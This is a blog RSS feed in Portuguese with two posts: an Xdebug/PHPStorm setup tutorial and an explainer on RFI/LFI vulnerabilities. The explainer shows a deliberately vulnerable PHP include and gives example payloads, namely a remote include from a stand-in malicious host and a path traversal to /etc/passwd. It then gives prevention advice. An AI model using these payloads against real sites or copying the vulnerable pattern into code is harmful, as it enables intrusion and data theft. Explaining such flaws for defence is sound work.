<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	
	xmlns:georss="http://www.georss.org/georss"
	xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#"
	>

<channel>
	<title>Linux Archives - Hiago Silva Souza</title>
	<atom:link href="https://www.hiago.me/category/linux/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.hiago.me/category/linux/</link>
	<description></description>
	<lastBuildDate>Sun, 04 Jun 2017 21:44:05 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.5.5</generator>

<image>
	<url>https://www.hiago.me/wp-content/uploads/2019/01/cropped-icon-hiagus-2-32x32.png</url>
	<title>Linux Archives - Hiago Silva Souza</title>
	<link>https://www.hiago.me/category/linux/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">147457425</site>	<item>
		<title>Configurar o XDEBUG no Linux usando o PHPStorm</title>
		<link>https://www.hiago.me/2017/06/04/depurando-php-no-linux-com-xdebug/</link>
					<comments>https://www.hiago.me/2017/06/04/depurando-php-no-linux-com-xdebug/#comments</comments>
		
		<dc:creator><![CDATA[Hiago Souza]]></dc:creator>
		<pubDate>Sun, 04 Jun 2017 21:37:31 +0000</pubDate>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[ide]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[phpstorm]]></category>
		<category><![CDATA[xdebug]]></category>
		<guid isPermaLink="false">http://www.hiago.me/?p=196</guid>

					<description><![CDATA[<p>Olá Pessoal, vocês já precisaram configurar o XDEBUG no Linux usando o PHPStorm? Tem tanta configuração, e tanto material nos blogs da JetBrains que chega a confundir a cabeça. Então resolvi postar uma maneira rápida e simples para fazer a configuração do seu XDEBUG com o seu PHPStorm. Fiz esse procedimento usando o Fedora Workstation &#8230;</p>
<p>The post <a href="https://www.hiago.me/2017/06/04/depurando-php-no-linux-com-xdebug/">Configurar o XDEBUG no Linux usando o PHPStorm</a> appeared first on <a href="https://www.hiago.me">Hiago Silva Souza</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Olá Pessoal, vocês já precisaram configurar o XDEBUG no Linux usando o PHPStorm? Tem tanta configuração, e tanto material nos blogs da JetBrains que chega a confundir a cabeça. Então resolvi postar uma maneira rápida e simples para fazer a configuração do seu XDEBUG com o seu PHPStorm.</p>
<blockquote><p>Fiz esse procedimento usando o Fedora Workstation 25.</p></blockquote>
<p>[wp_ad_camp_3]</p>
<h1>Instalando o XDEBUG</h1>
<p>Primeiro você deve acessar o seu terminal, e executar o comando abaixo como super usuário, no caso do fedora basta digitar o sudo antes do comando para se elevar com direitos administrativos no sistema operacional.</p>
<pre class="brush: bash; title: ; notranslate">

$ sudo dnf install php-xdebug

</pre>
<p>Pronto, após a execução do comando acima você já deve ter o XDEBUG instalado.</p>
<h1>Configurando o XDEBUG no php.ini</h1>
<p>[wp_ad_camp_1]</p>
<p>Primeiro passo é saber onde está o seu php.ini, para isso crie um arquivo teste.php com o conteúdo abaixo:</p>
<pre class="brush: php; title: ; notranslate">

&lt;?php

echo phpinfo();

</pre>
<p>Acesse pelo navegador, e localize a linha abaixo:</p>
<p><img fetchpriority="high" decoding="async" class="alignnone wp-image-199" src="http://www.hiago.me/wp-content/uploads/2017/06/Captura-de-tela-de-2017-06-04-18-06-28-300x35.png" alt="" width="720" height="84" srcset="https://www.hiago.me/wp-content/uploads/2017/06/Captura-de-tela-de-2017-06-04-18-06-28-300x35.png 300w, https://www.hiago.me/wp-content/uploads/2017/06/Captura-de-tela-de-2017-06-04-18-06-28-768x90.png 768w, https://www.hiago.me/wp-content/uploads/2017/06/Captura-de-tela-de-2017-06-04-18-06-28.png 959w" sizes="(max-width: 720px) 100vw, 720px" /></p>
<p>No caso o arquivo do xdebug encontra-se em <strong>/etc/php.d/15-xdebug.ini </strong>vamos editar ele e realizar as configurações necessárias.</p>
<p>Ao abrir o arquivo você provavelmente vai encontrar o conteúdo &#8220;zend_extension=xdebug.so&#8221;, acima dele adicione &#8220;[xDebug]&#8221; e abaixo as configurações para fazer o phpstorm funcionar com ele:</p>
<pre class="brush: plain; title: ; notranslate">

&#x5B;xdebug]
zend_extension=xdebug.so
xdebug.default_enable=1
xdebug.idekey=PHPSTORM
xdebug.remote_enable=1
xdebug.remote_autostart=1
xdebug.remote_port=9000
xdebug.remote_connect_back=1

</pre>
<p>Após isso reinicie o seu servidor http, no caso do Fedora estou usando o apache. Para reiniciar basta digitar o comando abaixo:</p>
<pre class="brush: bash; title: ; notranslate">

sudo service httpd restart

</pre>
<h1>Testando no phpStorm</h1>
<p>[wp_ad_camp_2]</p>
<p>Para testar no phpstorm, crie um arquivo teste.php faça alguma operação nele, coloque um breakpoint. Clique sobre o listener (<img decoding="async" class="alignnone size-full wp-image-206" src="http://www.hiago.me/wp-content/uploads/2017/06/Captura-de-tela-de-2017-06-04-18-17-56.png" alt="" width="31" height="35" />) e assim que ele ficar verde pode executar sua aplicação pelo navegador.</p>
<p>Pronto, XDEBUG instalado e pronto para uso pessoal.</p>
<p>&nbsp;</p>
<p>Links úteis:</p>
<p>XDebug: <a href="https://www.xdebug.org" target="_blank" rel="noopener noreferrer">https://www.xdebug.org</a></p>
<p>PHPStorm: <a href="https://www.jetbrains.com/phpstorm" target="_blank" rel="noopener noreferrer">https://www.jetbrains.com/phpstorm</a></p>
<p>Fedora WorkStation: <a href="https://getfedora.org/pt_BR/workstation/" target="_blank" rel="noopener noreferrer">https://getfedora.org/pt_BR/workstation/</a></p>
<p>The post <a href="https://www.hiago.me/2017/06/04/depurando-php-no-linux-com-xdebug/">Configurar o XDEBUG no Linux usando o PHPStorm</a> appeared first on <a href="https://www.hiago.me">Hiago Silva Souza</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.hiago.me/2017/06/04/depurando-php-no-linux-com-xdebug/feed/</wfw:commentRss>
			<slash:comments>3</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">196</post-id>	</item>
		<item>
		<title>Segurança: O que é RFI / LFI?</title>
		<link>https://www.hiago.me/2017/04/29/seguranca-o-que-e-rfi-lfi/</link>
					<comments>https://www.hiago.me/2017/04/29/seguranca-o-que-e-rfi-lfi/#comments</comments>
		
		<dc:creator><![CDATA[Hiago Souza]]></dc:creator>
		<pubDate>Sat, 29 Apr 2017 21:24:50 +0000</pubDate>
				<category><![CDATA[Linux]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Segurança]]></category>
		<category><![CDATA[lfi]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[prevenção]]></category>
		<category><![CDATA[rfi]]></category>
		<category><![CDATA[segurança]]></category>
		<guid isPermaLink="false">http://localhost/hiago/?p=62</guid>

					<description><![CDATA[<p>[wp_ad_camp_3] RFI/LFI, do inglês (Remote/Local File Include) é um tipo de vulnerabilidade de segurança para páginas na internet. Essa vulnerabilidade pode ser usada para explorar, interromper e até obter dados usando um serviço na internet, uma vez que o mesmo interprete a inclusão do código a partir de uma informação enviada pelo cliente diretamente para a &#8230;</p>
<p>The post <a href="https://www.hiago.me/2017/04/29/seguranca-o-que-e-rfi-lfi/">Segurança: O que é RFI / LFI?</a> appeared first on <a href="https://www.hiago.me">Hiago Silva Souza</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>[wp_ad_camp_3]</p>
<p>RFI/LFI, do inglês (Remote/Local File Include) é um tipo de vulnerabilidade de segurança para páginas na internet. Essa vulnerabilidade pode ser usada para explorar, interromper e até obter dados usando um serviço na internet, uma vez que o mesmo interprete a inclusão do código a partir de uma informação enviada pelo cliente diretamente para a aplicação.</p>
<h1>O Ataque!</h1>
<p>[wp_ad_camp_1]</p>
<p>O ataque ocorre quando o desenvolvedor faz a inclusão de arquivos, baseado em entradas dos usuários. Vamos colocar como exemplo, um formulário para selecionar o idioma de uma página:</p>
<blockquote><p>pagina.php</p></blockquote>
<pre class="brush: php; title: ; notranslate">
&lt;?php
   if(isset($_GET&#x5B;'idioma'))
        require_once($_GET&#x5B;'idioma']);
?&gt;
</pre>
<pre class="brush: xml; title: ; notranslate">


&lt;form method=&quot;GET&quot;&gt;
     &lt;select name=&quot;idioma&quot;&gt;
          &lt;option value=&quot;portugues.php&quot;&gt;Português&lt;/option&gt;
          &lt;option value=&quot;ingles.php&quot;&gt;Inglês&lt;/option&gt;
     &lt;/select&gt;
&lt;/form&gt;
</pre>
<p>Agora o php inclui um arquivo baseado na entrada do usuário, vamos ver alguns exemplos de entradas que poderiam causar dor de cabeça:</p>
<p>&nbsp;</p>
<blockquote><p>Exemplo de <strong>RFI</strong> (chamando um arquivo remoto&#8230;)</p>
<p>pagina.php?idioma=<b>http://malvado.exemplo.com.br/script-php-do-mal.txt?</b>. Agora imagine que o script-php-do-mal.txt contenha o seguinte conteúdo &#8220;@unlink(__DIR__ . &#8216;/pagina.php&#8217;);&#8221; pronto você acaba de perder seu script!</p></blockquote>
<blockquote><p>Exemplo de <strong>LFI</strong> (Chamando um arquivo local&#8230;)</p>
<p>pagina.php?idioma=<b>../../../../../etc/passwd%00?</b>. Você acaba de listar a senha de seus usuários UNIX online!</p></blockquote>
<p>&nbsp;</p>
<p><strong>Observação: </strong>Os exemplos acima são muitos comuns, e muitos provedores de hospedagem bloqueiam o acesso aos arquivos/url externas como citados nos exemplos. Os exemplos citados foram usados somente para mostrar possibilidades para exploração das falhas.</p>
<h1>Como se prevenir:</h1>
<p>[wp_ad_camp_2]</p>
<p>Caso você não seja o desenvolvedor e queira fazer uma precaução via servidor, você pode estar trabalhando com as configurações do PHP (ou do interpretador/linguagem que estiver usando), para isso desabilite a inclusão de URL&#8217;s no seu php.ini, para isso basta modificar o valor de allow_url_include para Off. No caso de LFI, o correto é o tratamento no próprio script (não fazendo uso de inclusões baseadas em informações de usuários), mas você pode se prevenir fazendo bom uso dos direitos que o próprio sistema operacional lhe oferece.</p>
<p>Obrigado!</p>
<p>Espero que com esse POST eu tenha contribuído para que vocês melhorem a segurança em suas aplicações.</p>
<p>The post <a href="https://www.hiago.me/2017/04/29/seguranca-o-que-e-rfi-lfi/">Segurança: O que é RFI / LFI?</a> appeared first on <a href="https://www.hiago.me">Hiago Silva Souza</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.hiago.me/2017/04/29/seguranca-o-que-e-rfi-lfi/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">62</post-id>	</item>
	</channel>
</rss>
